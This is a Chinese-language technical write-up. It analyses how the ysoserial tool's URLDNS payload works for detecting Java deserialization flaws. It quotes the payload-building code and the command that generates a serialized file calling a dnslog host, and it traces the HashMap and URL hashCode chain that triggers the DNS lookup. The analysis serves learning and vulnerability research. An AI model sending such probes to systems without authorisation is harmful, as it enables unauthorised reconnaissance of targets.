前言

Java反序列化漏洞 利用时,总会使用到ysoserial这款工具,安服仔用了很多,但是工具的原理却依旧不清不楚,当了这么久的脚本仔,是时候当一波(实习)研究仔,学习下这款工具各个Payload的原理了,下面我们先从漏洞探测模块URLDNS这个Payload开始学起,逐步衍生到漏洞利用模块。

为什么URLDNS模块会发送DNSLOG请求?

分析

下载ysoserial项目,打开pom.xml,程序入口在 ysoserial.GeneratePayload

打开GeneratePayload.java,找到main方法,代码如下:

当我们使用ysoserial执行以下命令时:

java -jar .\ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://lyxhh.dnslog.cn"  > dnslog.ser

首先ysoserial获取外面传入的参数,并赋值给对应的变量。

inal String payloadType = args[0]; // URLDNS
final String command = args[1]; //http://lyxhh.dnslog.cn

接着执行 Utils.getPayloadClass("URLDNS"); ,根据全限定类名 ysoserial.payloads.URLDNS ,获取对应的Class类对象。

final ObjectPayload payload = payloadClass.newInstance();

然后通过反射创建Class类对应的对象,走完这句代码,URLDNS对象创建完成。

final Object object = payload.getObject("http://lyxhh.dnslog.cn");

接着执行URLDNS对象中的getObject方法。

getObject方法中:

URLStreamHandler handler = new SilentURLStreamHandler();

创建了URLStreamHandler对象,该对象的作用,后面我们会详细说到。

接着:

HashMap ht = new HashMap();

创建了HashMap对象:

URL u = new URL(null, "http://lyxhh.dnslog.cn", handler);

URL对象:

ht.put(u, "http://lyxhh.dnslog.cn");

将URL对象作为HashMap中的key,dnslog地址为值,存入HashMap中。

Reflections.setFieldValue(u, "hashCode", -1);

通过反射机制 设置URL对象的成员变量hashCode值为-1,为什么要设置值为-1,这问题在反序列化时会详细说到。

将HashMap对象返回 return ht; ,接着对 HashMap对象 进行序列化操作 Serializer.serialize(object, out); 并将序列化的结果重定向到 dnslog.ser 文件中。

由于HashMap中重写了writeObject方法,因此在进行序列化操作时,执行的序列化方法是HashMap中的writeObject方法,具体如下:

先执行默认的序列化操作:

接着 遍历HashMap,对HashMap中的key,value进行序列化。

综上所述,梳理下ysoserial payload,URLDNS 序列化的整个过程:

  • 首先 ysoserial 通过反射的方式,根据全限定类名 ysoserial.payloads.URLDNS ,获取对应的Class类对象,并通过Class类对象的 newInstance() 方法,获取URLDNS对象。

  • 接着执行URLDNS对象中的getObject方法。

    • 在getObject方法中,创建了URLStreamHandler 对象 URLStreamHandler handler = new SilentURLStreamHandler(); ,该对象会被URL对象引用。

    • 创建HashMap对象 HashMap ht = new HashMap(); ,URL对象 URL u = new URL(null, "http://lyxhh.dnslog.cn", handler); 。

    • 将URL对象作为HashMap中的Key,DNSLOG的地址作为HashMap中的值 HashMap.put(u, "http://lyxhh.dnslog.cn");

    • 通过反射的方式 Reflections.setFieldValue(u, "hashCode", -1); ,设置URL对象中的成员变量hashCode值为-1。

    • 返回HashMap对象。

  • 然后对HashMap对象进行序列化操作 Serializer.serialize(HashMap object, out);

整个序列化过程中,有几个问题: 1、为什么要创建URLStreamHandler 对象,URL对象中默认的URLStreamHandler 对象不香吗。 2、为什么要设置URL对象中的成员变量hashCode值为-1。

反序列化分析

读取上述操作生成的 dnslog.ser 文件,执行反序列化,触发DNSLOG请求:

为什么HashMap的反序列化过程会发送DNSLOG请求呢?

在进行反序列化操作时,由于HashMap中重写了readObject方法,因此执行的反序列化方法是HashMap中的readObject方法,如下:

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
  
    // Read in the threshold (ignored), loadfactor, and any hidden stuff
    s.defaultReadObject(); // 执行默认的反序列化方法
    reinitialize(); //初始化变量值
    if (loadFactor <= 0 || Float.isNaN(loadFactor))
        throw new InvalidObjectException("Illegal load factor: " +
                                         loadFactor);
    s.readInt();                // Read and ignore number of buckets
    int mappings = s.readInt(); // Read number of mappings (size)
    if (mappings < 0)
        throw new InvalidObjectException("Illegal mappings count: " +
                                         mappings);
    else if (mappings > 0) { // (if zero, use defaults)
        // Size the table using given load factor only if within
        // range of 0.25...4.0
        float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
        float fc = (float)mappings / lf + 1.0f;
        int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                   DEFAULT_INITIAL_CAPACITY :
                   (fc >= MAXIMUM_CAPACITY) ?
                   MAXIMUM_CAPACITY :
                   tableSizeFor((int)fc));
        float ft = (float)cap * lf;
        threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                     (int)ft : Integer.MAX_VALUE);
        @SuppressWarnings({"rawtypes","unchecked"})
            Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
        table = tab;


        // Read the keys and values, and put the mappings in the HashMap
        for (int i = 0; i < mappings; i++) {
  
            @SuppressWarnings("unchecked")
                K key = (K) s.readObject(); // 遍历hashmap,进行反序列化操作,还原key值,这里的key值,是URL对象。
            @SuppressWarnings("unchecked")
                V value = (V) s.readObject(); // 还原value值,这里的value值,是dnslog的请求地址,http://lyxhh.dnslog.cn
            putVal(hash(key), key, value, false, false); //对key进行hash计算,确保唯一,并构造Hashmap对象。
        }
    }
}

readObject中,先执行默认的反序列化方法,接着还原HashMap,并计算Key,如下:

这里我们跟进hash(key)方法中。

接着执行了 key.hashCode() ,而key是URL对象,因此执行的是URL对象中的hashCode方法,继续跟进。

在序列化操作时,已经通过反射设置了URL的hashCode等于-1,因此这里会直接进入到 handler.hashCode(this); 中。

hashCode方法中会执行 getHostAddress(URL u) 方法,方法中调用了 InetAddress.getByName(host); 函数,从而发送DNSLOG请求。

使用 InetAddress.getByName(host); ,发送DNSLOG请求。

综上所述,梳理下ysoserial payload,URLDNS 反序列化的整个过程:

  • 首先 HashMap 重写了readObject方法,因此在反序列化过程中,执行的反序列化方法是HashMap中的readObject方法。

  • 在HashMap中的readObject方法中,会对Key进行hash计算 key.hashCode() ,而Key是URL对象,执行URL对象的hashCode方法。

  • 在URL.hashCode方法中,当hashCode成员变量值为-1时,会执行URLStreamHandler.hashCode()方法。

  • 在URLStreamHandler.hashCode()方法中,会执行 getHostAddress(URL u) 方法。

  • 在 getHostAddress(URL u) 方法中,会执行 InetAddress.getByName(host); ,从而发送DNSLOG请求。

解决序列化时遗留的问题

1、为什么要创建URLStreamHandler 对象,URL对象中默认的URLStreamHandler 对象不香吗。

URLDNS中getObject方法中。

public Object getObject(final String url) throws Exception {
  


    URLStreamHandler handler = new SilentURLStreamHandler();
    HashMap ht = new HashMap(); 
    URL u = new URL(null, url, handler); 
    ht.put(u, url);  


    Reflections.setFieldValue(u, "hashCode", -1); 
    return ht;
}
URLStreamHandler handler = new SilentURLStreamHandler();

创建了URLStreamHandler 对象。

这里我们先来看下SilentURLStreamHandler类。

static class SilentURLStreamHandler extends URLStreamHandler {
  


        protected URLConnection openConnection(URL u) throws IOException {
  
                return null;
        }


        protected synchronized InetAddress getHostAddress(URL u) {
  
                return null;
        }
}

SilentURLStreamHandler类继承URLStreamHandler,重写了openConnection,getHostAddress方法,将方法的实现置空了。

然后将handler传递给了URL构造函数。

URL u = new URL(null, url, handler); 

在URL构造函数中,如果handler存在,则执行 this.handler = handler;

接着我们执行了HashMap的put方法 ht.put(u, url); ,这里我们跟下put方法,如下:

在put方法中,执行了hash(key)方法,我们跟进hash方法:

跟进hashCode方法:

URL对象初始化后,hashCode值默认为-1。

因此第一次 HashMap.put 时,会进入 handler.hashCode(this) , 注意这里的handler是SilentURLStreamHandler的对象 ,跟进 URLStreamHandler.hashCode

在 URLStreamHandler.hashCode 中 存在getHostAddress()方法,在反序列化分析时,我们知道该方***发送DNSLOG请求,为了让HashMap在第一次put 元素时,不执行DNSLOG请求,因此,ysoserial重写了getHostAddress方法,将该方法置为空实现。

流程图对比:

使用默认的URLStreamHandler。

ht.put(new URL(null, url), url); --> 
  putVal(hash(key), key, value, false, true) --> 
    hash(key) --> 
      URL.hashCode() -->  
        URLStreamHandler.hashCode(this) --> 
          URLStreamHandler.getHostAddress(u) --> 发送DNSLog请求

使用重写的SilentURLStreamHandler。

URLStreamHandler handler = new SilentURLStreamHandler();
ht.put(new URL(null, url, handler), url); --> 
  putVal(hash(key), key, value, false, true) --> 
    hash(key) --> 
      URL.hashCode() -->  
        URLStreamHandler.hashCode(this) --> 
          SilentURLStreamHandler.getHostAddress(u) --> 空实现。
transient URLStreamHandler handler;

由于handler的类型是transient,被transient修饰的变量在序列化时,不会被存储,因此不影响反序列化链的触发。(反序列化时,handler是默认的,没有将getHostAddress方法置空,依旧可以执行DNSLOG请求)

SilentURLStreamHandler重写的openConnection函数,经过分析在URLDNS中并没有使用到,之所以存在是因为SilentURLStreamHandler类继承URLStreamHandler抽象类,必须实现该抽象类中的所有抽象方法。

小结: URLDNS通过URL构造函数 传递 SilentURLStreamHandler类对象,该类重写了getHostAddress方法,将方法体置为空实现,旨在执行HashMap.put时,不会触发DNSLOG请求,降低对目标漏洞的误判率。

2、为什么要设置URL对象中的成员变量hashCode值为-1。

在URL对象创建时,hashCode值默认为-1。

接着进行了HashMap.put操作,计算key hash时,会执行URL.hashCode方法。

执行完 handler.hashCode(this) ,会重置了hashCode成员变量的值,此时该值就不为-1了,这里我们通过反射获取 经过HashMap.put后 的hashCode值,如下:

而hashCode变量没有被transient修饰,因此序列化时会将hashCode变量值存储进序列化数据中。

在进行反序列化操作时,由于hashCode值不为-1,不会执行 handler.hashCode(this) ,从而导致无法发送DNSLOG请求。

因此在执行完HashMap.put后,需要反射将hashCode的值设置了-1,以便反序列化执行时,可以正常发送DNSLOG请求。

网上的分析文章,绝大部分都是分析如何触发DNSLOG,但是关于ysoserial的其他细节构造却只字不提。

总结

本文从工具的命令使用出发,由浅入深的分析了URLDNS Payload 执行序列化的过程,以及反序列化时是如何触发DNSLOG请求,接着分析了ysoserial构造URLDNS Payload 的一些必要的细节,希望我的分析可以给大家带来帮助,后续我们将继续从ysoserial工具学习更多的反序列化知识。